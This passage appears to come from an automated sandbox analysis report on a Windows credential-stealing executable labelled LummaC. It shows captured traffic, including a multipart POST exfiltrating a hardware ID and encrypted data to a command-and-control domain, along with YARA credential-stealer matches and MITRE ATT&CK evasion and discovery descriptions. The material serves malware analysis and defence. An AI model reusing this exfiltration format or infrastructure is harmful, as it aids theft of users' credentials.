cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1823&rtt_var=697&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2141&delivery_rate=1601755&cwnd=200&unsent_bytes=0&cid=3f8fa36b46a2b5dd&ts=1735&x=0"
2024-12-27 07:46:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 07:46:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49727	104.21.11.101	443	788	C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:46:43 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WQGMY49GD2RBDCWT6P0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 583716 Host: mindhandru.buzz
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: 2d 2d 57 51 47 4d 59 34 39 47 44 32 52 42 44 43 57 54 36 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 57 51 47 4d 59 34 39 47 44 32 52 42 44 43 57 54 36 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 51 47 4d 59 34 39 47 44 32 52 42 44 43 57 54 36 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 Data Ascii: --WQGMY49GD2RBDCWT6P0Content-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--WQGMY49GD2RBDCWT6P0Content-Disposition: form-data; name="pid"1--WQGMY49GD2RBDCWT6P0Content-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: ab 80 d1 c4 df 8c 74 58 ef 2d 31 26 ca 24 01 92 b2 81 bb fb 8c aa f4 9e f9 10 fb a0 37 d8 f1 78 3e 18 38 22 01 11 3f be f9 49 ff bb 51 0b 0b 41 13 31 d1 bb 98 2e 3d 1e 7e 41 5d 36 26 e9 9a 71 52 20 d3 1b c4 7c b7 77 26 be eb 52 91 73 5c dc d3 17 74 c4 bb c1 d0 5d 70 ca 4e 70 fd 3a 12 33 cc dd 97 57 8f 76 c3 3b b7 21 ad cf 17 b7 36 31 fe 3a ee c6 8d b1 39 f4 1b 74 44 ca 55 73 48 be 59 6b ef 69 a9 fa 22 58 80 bb f2 22 d3 a4 26 f4 89 1a f9 31 b9 c1 73 c8 9f ae f8 8f 25 92 75 ea a1 54 e5 46 0d 2a ba 9c 28 21 a1 ee 93 8b 69 8b f6 99 d0 f0 e5 d4 57 a6 ff ea 72 ee 95 94 dd e2 2b 20 25 39 40 7f ab ce 92 5a 83 8e 28 64 10 a3 7d 5c 33 cf 5d 13 14 f0 90 20 ad dd 19 3a 19 26 c0 58 cc 31 18 0b f7 f2 bf b2 1e e0 71 dc af 8e 45 fb 57 2a bb aa ca 04 53 c8 26 66 f3 dd 92 Data Ascii: tX-1&$7x>8"?IQA1.=~A]6&qR \|w&Rs\t]pNp:3Wv;!61:9tDUsHYki"X"&1s%uTF(!iWr+ %9@Z(d}\3] :&X1qEWS&f
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: 42 a1 eb e5 e7 b7 4a f5 a7 36 f7 95 8f ab cd 59 ff 92 50 e1 5d 8e e6 dc fb b5 c7 4e b2 88 5c ea 6a 2b 3c 3b e0 37 ef c7 5e f9 b6 c3 65 cc 71 ba ff f5 cd f4 69 14 53 d2 de f7 fb 47 bb b2 9e 8f 0c c7 14 9f 9b 5b 25 73 93 79 27 c0 fa 68 ba c2 7f 03 2c e3 aa 48 85 88 d3 de 75 0d d5 29 2f 8f 12 e2 17 bc 9e 3c 52 02 2b e4 70 54 f3 68 6d 21 0e 25 fc ec 4e 21 44 09 71 47 43 e8 d0 5d e0 74 a6 7f ba 95 4c bd 57 c0 d6 8f 5d 06 ae b6 45 99 d6 57 b7 13 ad 18 68 93 03 45 4e b6 17 b6 a0 1d 82 53 e3 1d d4 90 80 4b ab 73 5a a8 30 34 16 03 01 ce eb 4b d4 6b 62 24 19 4a 97 90 fa 4c 93 0a f3 16 f8 7d 87 91 10 4a bb e3 9b 4d 93 44 a0 c5 d3 9f 06 54 83 bc b4 cc 9f cf c6 a7 8c fc 4e 0c 15 3f 9e 29 39 30 e8 f3 f1 d6 99 79 ec 89 64 bb 83 a4 ec 8b 2c 2b 6c df 4e 0f 8e d6 53 6c 40 Data Ascii: BJ6YP]N\j+<;7^eqiSG[%sy'h,Hu)/<R+pThm!%N!DqGC]tLW]EWhENSKsZ04Kkb$JL}JMDTN?)90yd,+lNSl@
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: b2 f5 02 e5 c7 fe b1 b3 bd f4 4a 6b 77 a3 c9 01 a4 82 da 0a c8 fb 30 75 65 22 99 70 d8 b7 96 f5 ec 48 70 a1 1c 35 1d cd 7e 63 70 0a c4 c8 e6 87 c8 b8 f6 ab 30 94 ef 12 4e a4 a4 86 c5 af 0a 31 a6 5b 86 26 9d da d8 de 3b b7 3b 3c fa 84 1a f8 db d2 29 d5 d2 52 a2 8f 86 7d 96 08 1b 84 b8 ad 01 44 a2 10 19 34 3e aa 34 4a e4 08 1c ae 42 d3 f1 17 12 ec 25 4b 4e 9b 09 81 22 04 e2 91 8f cb ac 14 38 8d eb ea fc 90 90 3b 9b 27 34 a9 01 a3 d6 f5 e5 52 38 be 3e 69 45 1e 6d b6 ef 7f bc 86 00 bb 04 01 3f 54 2c 0d 64 23 c2 de 37 a1 3e a2 f1 1d 3f 3b b1 e0 e9 5b f7 01 c1 9f a3 fd 95 fa 60 39 f5 e9 6d 7b b8 9c 0d 69 a3 fd 28 ff ba c3 f3 cf 1a b9 7a db fc 65 1f 31 29 17 59 87 49 4f 81 2c 39 cc eb 42 d5 69 32 0b 6a 7d f2 83 ab 26 7b 1f 54 7a ec 21 7f 0d 7a e6 86 8b ad 4e d0 Data Ascii: Jkw0ue"pHp5~cp0N1[&;;<)R}D4>4JB%KN"8;'4R8>iEm?T,d#7>?;[`9m{i(ze1)YIO,9Bi2j}&{Tz!zN
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: 62 5a 33 b7 ed 53 d3 b1 ea f6 82 cc d8 4a 54 50 0c 7b f2 1a 01 1d ec d8 b6 21 00 1c b6 c0 dc 06 1d 44 46 9c a8 2d 6b 0b 0c 43 05 0b ac f6 36 55 49 2e 14 60 23 9b 09 32 c7 eb 7b 8d 1d e9 92 7b 11 e9 da 36 56 84 71 80 62 d7 8a e1 71 53 31 e8 c2 8d 43 57 b8 15 9d 89 d1 e0 57 0a 79 ed 68 27 c7 2a bf e1 19 e5 08 48 f0 01 7a 87 5a 61 85 02 d2 00 5b 73 6c 77 a4 1e 84 a6 f4 dd 97 27 42 a7 60 3e 5c 60 6a 14 b6 3d 4e 9d 03 b3 ad e6 6e 70 4d 95 94 a2 60 c3 48 45 87 a0 a8 e9 7a b4 dd fd 19 8b f1 44 98 39 27 08 b7 8a 9e da 41 47 e8 f8 4d 79 bf cf 32 49 f2 59 53 cf 29 9c 21 4c f5 17 1e d9 a2 9a 9f 49 bf a4 fa ba 9e f6 69 c4 ec 05 55 6f 20 de 8b 61 08 2c 2d b1 09 8d e2 62 31 22 d5 ff 1b b2 ca bb d4 d8 97 8b b9 81 ff fc bf ad 2f af 7e fa 43 ae 38 24 d6 dc 46 d7 04 87 65 Data Ascii: bZ3SJTP{!DF-kC6UI.`#2{{6VqbqS1CWWyh'*HzZa[slw'B`>\`j=NnpM`HEzD9'AGMy2IYS)!LIiUo a,-b1"/~C8$Fe
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: 65 53 d6 6a 29 c4 ab 65 f3 a3 07 5b 50 0d d7 53 40 13 a0 b6 b6 ac 16 3c b6 95 e2 f0 19 d0 cb 77 e3 d7 63 ee b5 c1 a8 4e ba d2 7c d2 a4 e1 b0 a3 bc fc b0 ad 63 8b dc 75 19 07 94 e1 b1 35 a7 d3 fa ca a8 15 0f 4e 8c 7a 5b 88 c1 8b 8d 7a 8f 63 e0 ab 44 c8 7b 2e 04 b8 31 26 c7 0e d9 12 d8 d9 74 95 86 3e 5f e8 17 9c 2d 7e 6e c6 fa 4a 18 fe f0 cd 9e 8a 00 93 42 8f c6 82 f6 d7 32 aa b7 68 b2 04 82 a4 49 aa 2f 6b 71 62 b1 be cb 24 b7 6a e9 cf 1b 04 d5 63 bc 85 0f 16 7b 5c 3f 8f 8e ff fc 4c 1b 23 a5 f0 d7 55 99 61 32 b6 f3 e3 a4 b5 24 83 38 bd d3 2f 11 5e 29 f4 af 17 52 15 e8 b0 12 5a 18 ee c9 e1 51 43 82 cb 07 50 2f 28 74 91 70 52 46 f4 20 af d3 70 be e3 9e 2b b7 d8 c3 cc 17 46 8b f3 e3 69 cc 6e 31 ce 7a 7b 32 93 e8 53 b0 be ff 65 d1 17 ee 48 c6 9c 21 04 d6 b6 c7 Data Ascii: eSj)e[PS@<wcN\|cu5Nz[zcD{.1&t>_-~nJB2hI/kqb$jc{\?L#Ua2$8/^)RZQCP/(tpRF p+Fin1z{2SeH!
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: c5 02 81 d7 48 f3 8c 02 51 70 e1 24 c8 ab 22 5a 3c 7b 81 a9 f8 f1 e5 f6 e5 97 cf 32 7e 47 0a 95 2e af f8 9f e3 65 8e c9 3e 54 5a 8e 33 ee dc 38 bc f2 75 b6 59 3b b6 ee 43 dd fa c1 c5 ca c7 5a 91 d6 8f 1b 1a 3e 7d 4d f9 a0 ee 73 eb 46 95 11 06 36 08 c5 3c e0 e3 50 df 58 07 1e 2f f9 0c cf 71 31 90 41 d2 e7 5d 4f fd ef 3e 24 f1 fb dc fc 10 a3 04 90 78 a0 e5 64 ca 49 7e fa 6e bc f8 23 ce b1 5f 08 6b 14 4c 9e d4 14 ee 81 23 a2 b0 3d 38 26 eb 0c 91 1b 60 d9 45 f5 db 4b 68 06 55 09 c8 36 e3 60 bd 85 d3 10 e1 8f f4 03 c4 44 21 b7 ef 54 fd 6b 77 5c f3 e2 2f 51 46 02 32 61 7e b8 9c 94 93 71 b8 64 65 f8 c4 df f8 ec 65 90 f0 bf fc 69 0b 0b cd 36 11 55 58 d8 66 ee 42 3a dc 4b 97 92 55 e8 ff f9 77 41 a6 6d 0e 19 d5 4a 75 94 01 8f 77 c3 16 b7 42 52 eb 42 14 8f b1 10 4d Data Ascii: HQp$"Z<{2~G.e>TZ38uY;CZ>}MsF6<PX/q1A]O>$xdI~n#_kL#=8&`EKhU6`D!Tkw\/QF2a~qdeei6UXfB:KUwAmJuwBRBM
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: 3d 22 35 1d 8d e6 29 88 96 3f 09 0f a8 15 a6 38 30 37 c8 f7 e9 e1 68 d4 ef 53 0e fa 47 07 ed 6f 4a 8f d2 cb d1 33 ef 10 96 d9 7a b6 d8 fc b2 6d 3f 89 8a 6e 25 a1 44 37 00 4b 58 b8 7f b6 30 24 9b 59 32 a6 36 c5 89 24 99 43 3f c8 63 8b 2a fb 9e 61 57 88 b1 e6 6e e2 bc 2e 2d 5b e0 3c 3c 12 4f 0d de de d8 88 85 c0 95 c8 21 37 59 68 7d 3f 83 c9 5d 29 1d de 5a f0 bd bd 79 d2 b5 e5 1e e7 a0 b5 46 5c 64 c9 7f 16 3e aa 75 4a fd 1f 4c 51 d1 c3 1f 27 87 5b 6c 4b 8f c4 86 d3 99 e9 c0 b1 e7 2d ca 1a a2 1b 6d 60 05 20 6e c9 cb fd 66 03 52 85 5a 8c 8a 33 e4 56 4e 3c 0c c7 a9 93 f3 18 0e de 8b 7d 3b 09 21 cb 57 0b 12 8f 24 f2 b5 a3 06 fd 81 6e 3b 62 cb 46 4c 7c 88 73 5c 63 9a 3d 99 93 1c b2 f9 62 38 e0 29 bd 5d b0 fb 5c ac d5 49 c4 b3 03 4c 09 d0 2d 1b 5b ee 1c 5f c4 38 Data Ascii: ="5)?807hSGoJ3zm?n%D7KX0$Y26$C?c*aWn.-[<<O!7Yh}?])ZyF\d>uJLQ'[lK-m` nfRZ3VN<};!W$n;bFL\|s\c=b8)]\IL-[_8
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: 5f 79 fb cd 11 66 66 af 41 97 11 78 67 6d ed 0d 0e ae df d5 f7 d0 47 20 81 7d 63 c7 69 a6 22 4d 41 b5 de 8f f5 ed 22 a1 c1 cc 7f f3 5b 74 f9 e7 9e 27 79 0a f0 66 df ab 55 21 86 fd 17 59 78 64 e3 a1 36 62 a9 b2 b3 6b cd d0 41 a2 25 80 ab d3 51 fb 4f fe b9 4d 8b c5 96 1a 48 62 53 c0 bd 62 25 bf 73 ea f5 5c ed 1f 7d 91 08 31 97 f5 d1 9a c9 11 d3 3d 40 47 b0 4b 63 3e 00 4f a6 3c 53 8c 52 2e ef a5 6c 3d 9a bf 54 ef f6 6d d3 1a c9 b0 27 97 0c bc f3 97 05 67 ca 11 48 4a 8a 98 8c c2 bb 66 31 b0 8e e0 55 7e 6b b2 b9 f5 1a 1a b3 fd cf ba b0 ff 63 fc 00 c4 20 d9 95 58 e6 42 b4 0b f8 c5 34 22 05 1a 82 e5 f1 4f c9 a8 eb 75 39 9b 92 8f 15 25 50 84 a8 1e a8 9e b5 ac 6e 87 3f cb ec bc bf 10 a1 b2 3f d9 f2 5e fd 61 f9 bb 7d 34 cd 1d 0f 7f 92 87 da 0c f8 7f 0a be 20 2a 8f Data Ascii: _yffAxgmG }ci"MA"[t'yfU!Yxd6bkA%QOMHbSb%s\}1=@GKc>O<SR.l=Tm'gHJf1U~kc XB4"Ou9%Pn??^a}4 *
2024-12-27 07:46:43 UTC	15331	OUT	Data Raw: e2 09 01 dc f6 1d 24 3c d8 a4 be dd ac 4f df 5b 31 03 18 37 20 90 f2 17 30 7c 79 c1 fa f4 9a 2c 60 d2 90 f0 f8 18 4e 87 ca 7a ed b9 fd c0 32 6a bb 82 cd 42 df 82 18 cf e4 00 43 7b ae ec 71 e5 4a e7 e5 8d f3 e6 ba 4f 5b ca ae da 58 61 29 ae 2d d8 2c 04 bc 03 62 ef 41 20 44 c0 db 7f e7 0a 9b c5 dc 61 e8 01 19 6d d0 2d c8 f2 46 84 3d de 09 62 78 9b ce 88 00 eb 7e b9 b2 b6 fb f8 dc 53 7d 19 81 ba a8 a4 2b a2 77 6b af 3e 2c 8e 42 69 cf fb 1a a7 08 29 1d 38 3a 0d e3 d3 f0 30 9e 8c a7 bf 64 df 14 8d b7 1d 86 19 5f 33 f9 e6 7d e5 a5 c2 ac c6 57 4c 3b 47 57 ee 57 f7 fa e7 fc e9 29 ce f9 52 b4 02 b6 31 5c 68 59 7c 34 a7 55 6e 19 15 2c 0d 46 b7 2a cb 29 82 69 b3 95 5a 0f 57 24 dd 67 de fd 28 c8 35 be 2c 09 7c 5e 40 45 05 80 bc 73 c2 15 0d 78 b6 fe 5d 40 5c ab c2 b5 Data Ascii: $<O[17 0\|y,`Nz2jBC{qJO[Xa)-,bA Dam-F=bx~S}+wk>,Bi)8:0d_3}WL;GWW)R1\hY\|4Un,F*)iZW$g(5,\|^@Esx]@\
2024-12-27 07:46:46 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 07:46:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4jo13p8n57siolv607k0a8tk34; expires=Tue, 22 Apr 2025 01:33:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBFcxdXKkMzruLkk2oR1EzO8merbb7VB6tvI838B563oEG%2FB42htxF3p4lPGEQ8Ts4xZiZrwiKnPwHv3EsKYd2L1SQn3hP9Yi7WZy2rO1XTEA7WCtV3S%2BwNp7AHQY7ILUFM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87b2d11eccc328-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1495&rtt_var=572&sent=338&recv=608&lost=0&retrans=0&sent_bytes=2838&recv_bytes=586307&delivery_rate=1893644&cwnd=177&unsent_bytes=0&cid=05905b676912fd6f&ts=2494&x=0"

Target ID:	0
Start time:	02:46:24
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\IERiUft8Wi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IERiUft8Wi.exe"
Imagebase:	0x830000
File size:	1'884'672 bytes
MD5 hash:	C317F66C3BB595D92533E3D0FE227366
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1419276605.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IERiUft8Wi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
IERiUft8Wi.exe